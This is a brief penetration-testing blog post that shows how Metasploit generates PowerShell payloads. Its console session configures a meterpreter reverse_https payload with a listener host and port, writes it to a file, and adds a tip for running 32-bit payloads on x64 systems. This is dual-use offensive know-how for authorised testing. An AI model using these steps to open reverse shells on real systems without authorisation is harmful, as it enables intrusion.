![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE2wYIFPeQo3Cg7kE6FRCP9u0AmKH5Ihit_teDn4AD2JXaNeAFQSERG5TQ0HGSSLtRloxWS7gDZTtN8x0CxzmXOzAgONi2FBJ5UbytHRyItbqaFNFoOfpylHiTWMKyv4USVECt4bSbQ-A/s200/ps.jpg)
Quick post, since i mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to this) payloads.
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf payload(reverse_https) > set LPORT 443
LPORT => 443
msf payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf payload(reverse_https) >
Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies. If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.
PowerShell version
PowerShell .net version
No comments:
Post a Comment